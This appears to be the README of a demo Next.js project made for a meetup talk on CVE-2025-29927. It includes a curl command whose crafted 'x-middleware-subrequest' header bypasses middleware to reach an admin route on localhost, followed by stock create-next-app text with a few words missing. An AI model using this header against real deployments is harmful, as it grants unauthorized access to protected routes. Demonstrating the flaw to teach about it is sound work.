
A demo of the CVE-2025-29927 vulnerability for a NebraskaJS lightning talk
This is a Next.js project bootstrapped with create-next-app.
First, you can confirm that the middleware works and should redirect the user:
curl http://localhost:3000/api/admin
Then, you can show how the middleware is being bypassed with the followign command:
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/api/admin
First, run the development server:
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
Open http://localhost:3000 with your browser to see the result.
You can start editing the page by modifying app/page.tsx. The page auto-updates as you edit the file.
This project uses to automatically optimize and load , a new font family for Vercel.
next/fontTo learn more about Next.js, take a look at the following resources:
You can check out the Next.js GitHub repository - your feedback and contributions are welcome!
The easiest way to deploy your Next.js app is to use the Vercel Platform from the creators of Next.js.
Check out our Next.js deployment documentation for more details.